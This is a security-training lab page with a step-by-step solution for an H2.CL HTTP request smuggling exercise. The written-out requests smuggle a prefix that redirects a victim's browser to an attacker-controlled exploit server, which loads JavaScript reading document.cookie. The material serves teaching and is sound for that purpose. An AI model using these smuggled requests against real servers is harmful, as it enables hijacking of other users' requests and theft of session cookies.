Lab: H2.CL request smuggling

PRACTITIONER

This lab is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length.

To solve the lab, perform a request smuggling attack that causes the victim's browser to load a malicious JavaScript file from the exploit server and call alert(document.cookie). The victim user accesses the home page every 10 seconds.

Note

This lab supports HTTP/2 but doesn't advertise this via ALPN. To send HTTP/2 requests using Burp Repeater, you need to enable the Allow HTTP/2 ALPN override option and manually change the protocol to HTTP/2 using the Inspector.

Please note that this feature is only available from Burp Suite Professional / Community 2021.9.1.

Hint

Solving this lab requires a technique that we covered in the earlier HTTP request smuggling materials

Access the lab

Solution

From the Repeater menu, enable the Allow HTTP/2 ALPN override option and disable the Update Content-Length option.
Using Burp Repeater, try smuggling an arbitrary prefix in the body of an HTTP/2 request by including a Content-Length: 0 header as follows. Remember to expand the Inspector's Request Attributes section and change the protocol to HTTP/2 before sending the request.
POST / HTTP/2 Host: YOUR-LAB-ID.web-security-academy.net Content-Length: 0 SMUGGLED
Observe that every second request you send receives a 404 response, confirming that you have caused the back-end to append the subsequent request to the smuggled prefix.
Using Burp Repeater, notice that if you send a request for GET /resources, you are redirected to https://YOUR-LAB-ID.web-security-academy.net/resources/.
Create the following request to smuggle the start of a request for /resources, along with an arbitrary Host header:
POST / HTTP/2 Host: YOUR-LAB-ID.web-security-academy.net Content-Length: 0 GET /resources HTTP/1.1 Host: foo Content-Length: 5 x=1
Send the request a few times. Notice that smuggling this prefix past the front-end allows you to redirect the subsequent request on the connection to an arbitrary host.
Go to the exploit server and change the file path to /resources. In the body, enter the payload alert(document.cookie), then store the exploit.
In Burp Repeater, edit your malicious request so that the Host header points to your exploit server:
POST / HTTP/2 Host: YOUR-LAB-ID.web-security-academy.net Content-Length: 0 GET /resources HTTP/1.1 Host: YOUR-EXPLOIT-SERVER-ID.web-security-academy.net Content-Length: 5 x=1
Send the request a few times and confirm that you receive a redirect to the exploit server.
Resend the request every 10 seconds or so until the victim is redirected to the exploit server and the lab is solved.

Want to track your progress and have a more personalized learning experience? (It's free!)

Lab: H2.CL request smuggling

Note

Hint

Solution

In this topic

All topics

Find request smuggling vulnerabilities using Burp Suite

Register for free to track your learning progress